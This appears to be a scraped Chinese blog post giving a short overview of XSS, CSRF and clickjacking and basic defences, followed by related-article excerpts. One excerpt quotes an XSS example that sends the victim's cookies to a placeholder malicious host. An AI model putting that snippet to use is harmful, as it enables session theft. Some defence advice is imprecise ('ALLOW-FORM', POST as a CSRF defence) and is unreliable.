. 前沿

之前做过互联网金网，或者涉及到金融，结账，说白了就是接触到钱的问题前端安全就会县的尤为重要了。我了解的也不是很透彻，这个东西还是要好好学习一下啊。
目前来说前端安全一般有三个攻击网站的方法

第一个 xss攻击

xss：跨站脚本攻击，攻击者通过注入非法的html标签或者javascript代码，从而当用户浏览该网页时，控制用户浏览器。

造成的影响：

1，利用虚假输入表单骗取用户个人信息。
2，利用脚本窃取用户的cookie，帮助攻击者发送恶意请求。
3，显示伪造的文章或者图片。

如何防范

只要有输入数据的地方就有可能有xss攻击，例如：登录，注册，填写个人信息。
防范措施：
1，前后端对输入的内容进行检验，过滤
2，在cookie中设置httpOnly属性js脚本就无法获取cookie信息。

第二个 csrf攻击

跨站点请求伪造，冒充用户发起请求。

造成的影响：

1，更新用户信息
2，使用已通过的用户信息购买产品
3，使用已通过的用户信息发表评论

如何防范

1, 验证码，极验，就是在做一些重要操作时需要进行验证才能完成，这样可以更好的防范csrf
2, 众所周知，尽量使用post请求
3，请求加token验证

第三个点击劫持

就是利用网页上透明的按钮或链接做成陷阱，当用户点击时跳转到攻击页面，最为常见的就是iframe跳转

如何防范

X-FRAME-OPTIONS HTTP 响应头是用来给浏览器指示允许一个页面是否应该加载</code>中的页面</p> <blockquote> <p>修改web服务器配置，添加<code>X-FRAME-OPTIONS</code>响应头</p> <blockquote> <p><code>X-FRAME-OPTIONS</code>的配置项</p> </blockquote> </blockquote> <ul> <li>1， DENY:不能被潜入到任何iframe中</li> <li>2，SAMEORIGIN：页面只能被本站页面嵌入</li> <li>3，ALLOW-FORM url: 只能被嵌入到指定的域名框架中</li> </ul> <h3>结束语</h3> <p>其实我了解的也是皮毛，在项目中常用的就就是token和极验，还需要多多学习。</p> </article> </div> </div> </div>  <div id="SOHUCS" sid="1276299900723675136"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script>  <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad">  <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div>  <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div>  <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(前端安全问题小结)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1761435096642052096.htm" title="web前端安全性——iframe安全问题" target="_blank">web前端安全性——iframe安全问题</a> <span class="text-muted">장숙혜</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8%E6%80%A7/1.htm">前端安全性</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>1、概念iframe安全问题可称作界面劫持，像点击劫持、拖放劫持、触屏劫持。就是我们的点击，拖放，触屏操作被劫持了，而去操作了其它的透明隐藏的界面。**原理是利用透明层iframe,使用了CSS中的opacity或z-index等属性，来到达透明和位于其它界面的上方，然后使用iframe来嵌入劫持页面。**到达了用户操作的不是它看到的界面，不是他以为的那个界面，而是那个透明的位于上层的界面。代码：</div> </li> <li><a href="/article/1757077057495384064.htm" title="前端安全字体" target="_blank">前端安全字体</a> <span class="text-muted">IT杨</span> <div>serif类font-family:Garamond,serif;font-family:Georgia,serif;font-family:'TimesNewRoman',Times,serif;font-family:'BookmanOldStyle',serif;font-family:'PalatinoLinotype','BookAntiqua',Palatino,serif;2.san</div> </li> <li><a href="/article/1756336321728626688.htm" title="[vue源码01] data响应式和初始化渲染" target="_blank">[vue源码01] data响应式和初始化渲染</a> <span class="text-muted">woow_wu7</span> <div>导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制（http缓存机制）[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入15]web</div> </li> <li><a href="/article/1755370513460379648.htm" title="【芯片设计- RTL 数字逻辑设计入门 11 -- 移位运算与乘法】" target="_blank">【芯片设计- RTL 数字逻辑设计入门 11 -- 移位运算与乘法】</a> <span class="text-muted">CodingCos</span> <a class="tag" taget="_blank" href="/search/%E8%8A%AF%E7%89%87%E8%AE%BE%E8%AE%A1/1.htm">芯片设计</a><a class="tag" taget="_blank" href="/search/RTL/1.htm">RTL</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E5%AD%97%E9%80%BB%E8%BE%91%E8%AE%BE%E8%AE%A1%E6%89%AB%E7%9B%B2/1.htm">数字逻辑设计扫盲</a><a class="tag" taget="_blank" href="/search/fpga%E5%BC%80%E5%8F%91/1.htm">fpga开发</a><a class="tag" taget="_blank" href="/search/%E7%A7%BB%E4%BD%8D%E8%BF%90%E7%AE%97%E4%B8%8E%E4%B9%98%E6%B3%95/1.htm">移位运算与乘法</a><a class="tag" taget="_blank" href="/search/FPGA/1.htm">FPGA</a> <div>请阅读【嵌入式开发学习必备专栏】文章目录移位运算与乘法VerilogCodeverilog拼接运算符（{}）TestbenchCodeVCS波形仿真问题小结移位运算与乘法已知d为一个8位数，请在每个时钟周期分别输出该数乘1/3/7/8,并输出一个信号通知此时刻输入的d有效（d给出的信号的上升沿表示写入有效）可以看到输入D的波形在为6的地方比较特殊，从波形上可以看到它只持续了一个时钟周期，但是out</div> </li> <li><a href="/article/1755312834356461568.htm" title="Springboot集成flowable工作流" target="_blank">Springboot集成flowable工作流</a> <span class="text-muted">快乐的木子李</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C%E6%B5%81/1.htm">工作流</a><a class="tag" taget="_blank" href="/search/%E6%8A%80%E6%9C%AF%E6%A0%88/1.htm">技术栈</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a> <div>文章目录概要包依赖问题小结概要Spirngboot集成flowable3.1.5包依赖org.flowableflowable-spring-boot-starter7.0.1使用7.0.1版本问题项目启动初始化flowable表结构异常.原因如下：mysql8.xxx以上驱动会出现这个问题mysql使用schema标识库名而不是catalog，因此mysql会扫描所有的库来找表，如果其他库中有相</div> </li> <li><a href="/article/1755173988075585536.htm" title="前端安全问题总结" target="_blank">前端安全问题总结</a> <span class="text-muted">大唐荣华</span> <a class="tag" taget="_blank" href="/search/%E5%A4%A7%E5%89%8D%E7%AB%AF/1.htm">大前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/1.htm">前端安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/CORS/1.htm">CORS</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/dos/1.htm">dos</a> <div>XSS攻击Cross-SiteScripting（跨站脚本攻击）简称XSS，是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本，使之在用户的浏览器上运行。利用这些恶意脚本，攻击者可获取用户的敏感信息如Cookie、SessionID等，进而危害数据安全。所以,网页上哪些部分会引起XSS攻击?简单来说,任何可以输入的地方都有可能引起,包括URL!常见的注入方法在HTML中内嵌的文本中，恶意内容以</div> </li> <li><a href="/article/1754712066381332480.htm" title="【芯片设计- RTL 数字逻辑设计入门 6 -- 带同步复位的D触发器 RTL实现及testbench 验证】" target="_blank">【芯片设计- RTL 数字逻辑设计入门 6 -- 带同步复位的D触发器 RTL实现及testbench 验证】</a> <span class="text-muted">CodingCos</span> <a class="tag" taget="_blank" href="/search/%E8%8A%AF%E7%89%87%E8%AE%BE%E8%AE%A1/1.htm">芯片设计</a><a class="tag" taget="_blank" href="/search/RTL/1.htm">RTL</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E5%AD%97%E9%80%BB%E8%BE%91%E8%AE%BE%E8%AE%A1%E6%89%AB%E7%9B%B2/1.htm">数字逻辑设计扫盲</a><a class="tag" taget="_blank" href="/search/fpga%E5%BC%80%E5%8F%91/1.htm">fpga开发</a> <div>文章目录带同步复位的D触发器Verilog代码testbench代码编译及仿真问题小结带同步复位的D触发器同步复位：复位只能发生在在clk信号的上升沿，若clk信号出现问题，则无法进行复位。Verilog代码//timescaleins/1nsmoduleflopr(inputrstn,inputclk,input[3:0]d,output[3:0]q);reg[3:0]q_out;//synch</div> </li> <li><a href="/article/1754596745125314560.htm" title="[深入02] 原型链" target="_blank">[深入02] 原型链</a> <span class="text-muted">woow_wu7</span> <div>导航2021/07/21更新constructor.png2021/07/22更新原型链.png[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制（http缓存机制）[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模</div> </li> <li><a href="/article/1753945812909441024.htm" title="前端安全防范措施，xss攻击和csrf攻击" target="_blank">前端安全防范措施，xss攻击和csrf攻击</a> <span class="text-muted">_咻咻咻咻咻</span> <div>xss跨站脚本攻击简单来说，就是攻击者想办法将可执行的代码注入页面。分为持久性和非持久性。持久性就是攻击的代码被存入了数据库，会导致大量用户网页被攻击。eg:input框中写入alert(1)，如果前后端没有防御，被存入数据库，每个打开该页面的用户都会被攻击。如何防御？转义字符functionescape(str){str=str.replace(/&/g,'&');str=str.replace</div> </li> <li><a href="/article/1753430419463749632.htm" title="2024 高级前端面试题之前端安全模块「精选篇」" target="_blank">2024 高级前端面试题之前端安全模块「精选篇」</a> <span class="text-muted">八了个戒</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E9%9D%A2%E8%AF%95/1.htm">前端面试</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95%E5%AE%9D%E5%85%B8/1.htm">面试宝典</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E5%89%8D%E7%AB%AF/1.htm">大前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E6%A1%86%E6%9E%B6/1.htm">前端框架</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E5%89%8D%E7%AB%AF/1.htm">大前端</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a> <div>该内容主要整理关于前端安全模块的相关面试题，其他内容面试题请移步至「最新最全的前端面试题集锦」查看。前端安全模块精选篇1.代码注入XSS如何攻击如何防御cookie如何防范XSS攻击2.跨站请求伪造CSRF3.浏览器同源策略SOP4.跨域资源共享CORS5.密码安全1.代码注入XSS跨网站指令码（英语：Cross-sitescripting，通常简称为：XSS）是一种网站应用程式的安全漏洞攻击，是</div> </li> <li><a href="/article/1753396678095814656.htm" title="Docker应用之daemon.json（一）" target="_blank">Docker应用之daemon.json（一）</a> <span class="text-muted">刘一说</span> <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E7%8E%AF%E5%A2%83/1.htm">软件环境</a><a class="tag" taget="_blank" href="/search/%E5%AE%9E%E6%88%98%E6%80%BB%E7%BB%93/1.htm">实战总结</a><a class="tag" taget="_blank" href="/search/springboot/1.htm">springboot</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a><a class="tag" taget="_blank" href="/search/%E5%AE%B9%E5%99%A8/1.htm">容器</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>目录问题复现原因分析解决步骤1.创建daemon.json2.国内镜像地址3.保存daemon.json4.重启docker服务5.查看镜像源问题小结官网docs提供的一个示例配置参数背景说明问题复现今天在用docker部署springboot项目时，出现JDK8依赖包下载失败，原因分析第一时间想到可能是镜像源地址导致的。查看docker镜像源配置文件：cat/etc/docker/daemon.</div> </li> <li><a href="/article/1752137339150286848.htm" title="[深入19] 手写Promise" target="_blank">[深入19] 手写Promise</a> <span class="text-muted">woow_wu7</span> <div>image导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制（http缓存机制）[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入1</div> </li> <li><a href="/article/1751742631886471168.htm" title="前端安全之XSS、CSRF" target="_blank">前端安全之XSS、CSRF</a> <span class="text-muted">菊の物语</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a> <div>XSS(cross-site-script)跨站脚本攻击跨站脚本攻击是通过在网站中注入恶意代码，来达到劫取用户cookie信息，或者实施其他破坏行动。例如：一个网站如果没有针对XSS做响应的安全措施，而且它存在添加评论的功能，那么用户可以在添加评论时输入如下文本varxhr=newXMLHttpRequest();xhr.open('GET','http://恶意网站.com/steal?cook</div> </li> <li><a href="/article/1750978876999221248.htm" title="Flowable使用docker中MySQL8，Springboot启动出错" target="_blank">Flowable使用docker中MySQL8，Springboot启动出错</a> <span class="text-muted">刘一说</span> <a class="tag" taget="_blank" href="/search/springboot/1.htm">springboot</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E7%8E%AF%E5%A2%83/1.htm">软件环境</a><a class="tag" taget="_blank" href="/search/%E5%AE%9E%E6%88%98%E6%80%BB%E7%BB%93/1.htm">实战总结</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>目录问题复现原因分析解决办法修改MYSQL大小写敏感配置问题小结docker的优点：问题复现最近在将项目迁至docker环境时，出现启动时失败，报错信息如下：Causedby:org.springframework.beans.factory.BeanCreationException:Errorcreatingbeanwithname'processEngine':FactoryBeanthre</div> </li> <li><a href="/article/1750819351801380864.htm" title="(SPP-Net)CNN处理图片时resize图片尺寸的问题小结" target="_blank">(SPP-Net)CNN处理图片时resize图片尺寸的问题小结</a> <span class="text-muted">kgbkqLjm</span> <a class="tag" taget="_blank" href="/search/Deep/1.htm">Deep</a><a class="tag" taget="_blank" href="/search/Learning/1.htm">Learning</a> <div>目前已知SPP和RoIpoolingCNN中卷积层Conv_Layer对图片size并没有限制,而全连接层FC_Layer则相反.SPP-Net(空间金字塔池化网络)背景SPP-Net是出自2015年发表在IEEE上的论文-《SpatialPyramidPoolinginDeepConvolutionalNetworksforVisualRecognition》.在SPP诞生之前，所有的神经网络都</div> </li> <li><a href="/article/1749585015424958464.htm" title="【ARMv8M Cortex-M33 系列 7 -- RA4M2 移植 RT-Thread 问题总结】" target="_blank">【ARMv8M Cortex-M33 系列 7 -- RA4M2 移植 RT-Thread 问题总结】</a> <span class="text-muted">CodingCos</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E3%80%90ARMv8M/1.htm">【ARMv8M</a><a class="tag" taget="_blank" href="/search/M33/1.htm">M33</a><a class="tag" taget="_blank" href="/search/%E4%B8%93%E6%A0%8F%E3%80%91/1.htm">专栏】</a><a class="tag" taget="_blank" href="/search/RA4M2/1.htm">RA4M2</a><a class="tag" taget="_blank" href="/search/rt-thread/1.htm">rt-thread</a> <div>请阅读【嵌入式开发学习必备专栏】文章目录问题小结栈未对齐经过几天的调试，成功将rt-thead移植到RA4M2（Cortex-M33核）上，thread和shell命令已经都成功支持。问题小结在完成rt-thread代码Makefile编译系统搭建后，就开始着手rt-threadOS的移植，不幸的是开始就遇到了问题：cortex-m33/context_gcc.S在退出PendSV_Handler</div> </li> <li><a href="/article/1749229915011563520.htm" title="前端安全" target="_blank">前端安全</a> <span class="text-muted">强某某</span> <div>XSScsrfxss其实都是针对session(cookie)攻击的，只要登出则这些都无效了CrossSiteScripting跨站脚本攻击XSS(Cross-SiteScripting)，跨站脚本攻击，因为缩写和CSS重叠，所以只能叫XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻击。跨站脚本攻击有可能造成以下</div> </li> <li><a href="/article/1748393584580640768.htm" title="探索去中心化应用：技术挑战与未来趋势" target="_blank">探索去中心化应用：技术挑战与未来趋势</a> <span class="text-muted">AigcFox</span> <a class="tag" taget="_blank" href="/search/%E5%8E%BB%E4%B8%AD%E5%BF%83%E5%8C%96/1.htm">去中心化</a><a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%9D%97%E9%93%BE/1.htm">区块链</a> <div>去中心化应用（DApps）在技术上面临着一系列挑战和难题，这些挑战涉及到安全性、性能、用户体验、跨平台兼容性等多个方面。以下是一些主要的挑战：安全性：智能合约漏洞：智能合约代码可能存在漏洞或错误，导致资金损失或数据泄露。共识机制攻击：去中心化系统的共识机制可能遭受攻击，如51%攻击（在PoW系统中）、Sybil攻击（在基于权益证明的系统中）等。前端安全：前端界面可能遭受XSS攻击、CSRF攻击等，</div> </li> <li><a href="/article/1747791924296695808.htm" title="前端安全相关" target="_blank">前端安全相关</a> <span class="text-muted">它经不起推敲的</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>请求后端接口必须带上sign以上主要是解决：除了数据泄露外，一些重要功能的接口如果没有做好保护措施也会被恶意调用造成DDoS、条件竞争等攻击效果一些营销活动类的Web页面，领红包、领券、投票、抽奖等活动方式很常见。此类活动对于普通用户来说应该是“拼手气”，而对于非正常用户来说，可以通过直接刷活动API接口的这种“作弊”方式来提升“手气”。这样对普通用户来说就很不公平登录密码使用sha256加密后传</div> </li> <li><a href="/article/1747256670435688448.htm" title="[2017专题] 前端安全" target="_blank">[2017专题] 前端安全</a> <span class="text-muted">weixin_34114823</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/ViewUI/1.htm">ViewUI</a> <div>过往专题搬运。前端安全开发视角反击爬虫，前端工程师的脑洞可以有多大？预防竞争对手用爬虫进行的信息抓取，我们除了可以在后端进行图灵测试，也可以前端在DOM处做手脚来混淆爬虫。前端防御之CSP详解针对XSS的前端防御，本文作者介绍了CSP的作用与绕过方式，最后给出结论：黑名单配合CSP仍然是最靠谱的防御方式。点击劫持小抄介绍了预防点击劫持的多个方案汇总。XSSCookBook介绍了XSS的3个分类与2</div> </li> <li><a href="/article/1747256411223506944.htm" title="前端安全专题" target="_blank">前端安全专题</a> <span class="text-muted">️不倒翁</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E9%9B%86%E5%90%88/1.htm">前端集合</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a> <div>xss(CrossSiteScripting)跨站脚本攻击原理通常指黑客通过"HTML注入"篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击。常见攻击类型存储型XSS攻击者将恶意的JavaScript脚本存储在网站的服务器上（例如，在一个评论区中发布含有恶意脚本的评论）。当其他用户浏览到包含这些脚本的页面时，就会执行这些脚本。反射型XSS反射型XSS只是简单地把用户输入</div> </li> <li><a href="/article/1746240851907985408.htm" title="Java：多线程问题小结（二）" target="_blank">Java：多线程问题小结（二）</a> <span class="text-muted">dingcho</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>21、FutureTask是什么这是一个比较偏实践的问题，这种问题我觉得挺有意义的。可以这么做：（1）获取项目的pid，jps或者ps-ef|grepjava，这个前面有讲过（2）top-H-ppid，顺序不能改变这样就可以打印出当前的项目，每条线程占用CPU时间的百分比。注意这里打出的是LWP，也就是操作系统原生线程的线程号，我笔记本山没有部署Linux环境下的Java工程，因此没有办法截图演示</div> </li> <li><a href="/article/1746102956920422400.htm" title="JavaScript系列——闭包" target="_blank">JavaScript系列——闭包</a> <span class="text-muted">爱喝酸奶的一旬</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>文章目录闭包定义词法作用域闭包示例使用场景创建私有变量ES5中，解决循环变量的作用域问题小结闭包定义闭包，是函数及其关联的周边环境的引用的组合，在闭包里面，内部函数可以访问外部函数的作用域，而外部函数不能范围内部函数的作用域，从而在内部函数形成一个相对封闭的环境。在JavaScript中，闭包随着函数创建而被创建。词法作用域词法作用域指的是在源码声明的变量，能够起作用的环境范围，一般是从变量所定义</div> </li> <li><a href="/article/1745587520185319424.htm" title="9.云原生存储之ceph在k8s中应用及问题处理" target="_blank">9.云原生存储之ceph在k8s中应用及问题处理</a> <span class="text-muted">野心与梦</span> <a class="tag" taget="_blank" href="/search/%E7%A7%81%E6%9C%89%E4%BA%91%E6%90%AD%E5%BB%BA%E5%AE%9E%E6%88%98/1.htm">私有云搭建实战</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E5%8E%9F%E7%94%9F/1.htm">云原生</a><a class="tag" taget="_blank" href="/search/ceph/1.htm">ceph</a><a class="tag" taget="_blank" href="/search/kubernetes/1.htm">kubernetes</a> <div>文章目录ceph应用场景ceph应用在k8s集群外使用块设备ceph客户端配置创建块挂载使用删除pool在k8s集群内使用块设备创建块池和StorageClass使用存储块存储映射问题处理问题现象事件分析csi-rbdpluginpod日志分析问题小结CentOS7编译安装nbd模块nbd内核模块介绍安装nbd模块重新使用块存储验证升级centos验证验证小结操作系统选择考虑Rocky8替换k8s</div> </li> <li><a href="/article/1744747415438639104.htm" title="XSS攻击以及java应对措施" target="_blank">XSS攻击以及java应对措施</a> <span class="text-muted">jakiechaipush</span> <a class="tag" taget="_blank" href="/search/Java%E9%9B%B6%E7%A2%8E%E7%9F%A5%E8%AF%86%E7%82%B9%E7%BD%97%E5%88%97/1.htm">Java零碎知识点罗列</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>文章目录一.XSS攻击介绍1.前端安全2.xss攻击简介3.xss的攻击方式二.java应对xss攻击的解决方案1.强制修改html敏感标签内容2.利用过滤器过滤非法html标签一.XSS攻击介绍1.前端安全随着互联网的高速发展，信息安全问题已经成为企业最为关注的焦点之一，而前端又是引发企业安全问题的高危据点。在移动互联网时代，前端人员除了传统的XSS、CSRF等安全问题之外，又时常遭遇网络劫持、</div> </li> <li><a href="/article/1744549428301152256.htm" title="前端安全，常见的攻击类型以及如何防御" target="_blank">前端安全，常见的攻击类型以及如何防御</a> <span class="text-muted">一月清辉</span> <a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/1.htm">前端安全</a> <div>文章目录1、CSRF攻击1.1、什么是CSRF攻击1.2、CSRF攻击的过程1.3、如何防御CSRF攻击2、XSS攻击2.1、XSS攻击是什么2.2、XSS攻击有哪些类型2.3、XSS攻击可以进行以下操作2.4、如何防御XSS攻击3、token为什么就比cookie安全4、cookie、token是什么5、有哪些可能引起前端安全的问题?6、网络劫持有哪几种，如何防范？7、浏览器渲染进程的线程有哪些</div> </li> <li><a href="/article/1744547632308568064.htm" title="前端安全：几种攻击模式" target="_blank">前端安全：几种攻击模式</a> <span class="text-muted">error_log</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/1.htm">前端安全</a> <div>1.XSS攻击主要是注入js代码，通过将js代码存入数据库或者通过修改URL参数的方式加入攻击代码，诱导用户访问链接从而进行攻击。防御措施：对字符串进行转义通常来说主要针对script标签进行转义functionescape(str){str=str.replace(/&/g,'&');str=str.replace(//g,'>');str=str.replace(/"/g,'&quto;');</div> </li> <li><a href="/article/1744547374384037888.htm" title="前端安全- 常见的网络攻击" target="_blank">前端安全- 常见的网络攻击</a> <span class="text-muted">姜慧慧</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%B7%A5%E7%A8%8B/1.htm">前端工程</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>1.xss攻击跨站脚本攻击1.1反射性攻击url参数直接注入（地址栏运行脚本）1.2影响利用虚假输入表单骗取用户个人信息利用脚本窃取用户的cookie值，被害者在不知情的情况下，帮助攻击者发送恶意请求显示伪造的文章或图片1.3存储型攻击存储到DB读取时注入1.4防御ctx.set（‘X-XSS-Protect’，‘0’）csp内容安全策略；白名单法：xss库，找到允许的代码；黑名单法：script</div> </li> <li><a href="/article/1744546866688704512.htm" title="前端安全—常见的攻击方式及防御方法" target="_blank">前端安全—常见的攻击方式及防御方法</a> <span class="text-muted">WLANQY</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9E%B6%E6%9E%84/1.htm">安全架构</a><a class="tag" taget="_blank" href="/search/%E5%8F%AF%E4%BF%A1%E8%AE%A1%E7%AE%97%E6%8A%80%E6%9C%AF/1.htm">可信计算技术</a> <div>Cookie挟持HTTP是无状态的协议，为了维持和跟踪用户的状态，引入了Cookie和Session。Cookie包含了浏览器客户端的用户凭证，相对较小。Session则维护在服务器，用于维护相对较大的用户信息。可以把Cookie当成密码，而Session是保险柜。由于HTTP是明文传输，Cookie很容易被盗取，如果被盗取，别人就可以冒充你的身份，打开你的保险柜，获取你的信息，动用你的资金，这是</div> </li> <li><a href="/article/1744546609867276288.htm" title="前端常见安全问题" target="_blank">前端常见安全问题</a> <span class="text-muted">NJR10byh</span> <a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a> <div>目录以下是对一些常见的前端安全问题的总结一、iframe1、防止自己的网站不被其他网站的iframe引用2、禁用被使用的iframe对当前网站某些操作二、opener1、target="_blank"2、window.open()三、CSRF/XSRF（跨站请求伪造）防御措施四、XSS/CSS（跨站脚本攻击）XSS类型：防御措施（对用户输入内容和服务端返回内容进行过滤和转译）五、ClickJack</div> </li> <li><a href="/article/5.htm" title="[星球大战]阿纳金的背叛" target="_blank">[星球大战]阿纳金的背叛</a> <span class="text-muted">comsci</span> <div>       本来杰迪圣殿的长老是不同意让阿纳金接受训练的.........     但是由于政治原因,长老会妥协了...这给邪恶的力量带来了机会     所以......现代的地球联邦接受了这个教训...绝对不让某些年轻人进入学院    </div> </li> <li><a href="/article/132.htm" title="看懂它，你就可以任性的玩耍了！" target="_blank">看懂它，你就可以任性的玩耍了！</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>          javascript作为前端开发的标配技能，如果不掌握好它的三大特点：1.原型 2.作用域 3. 闭包 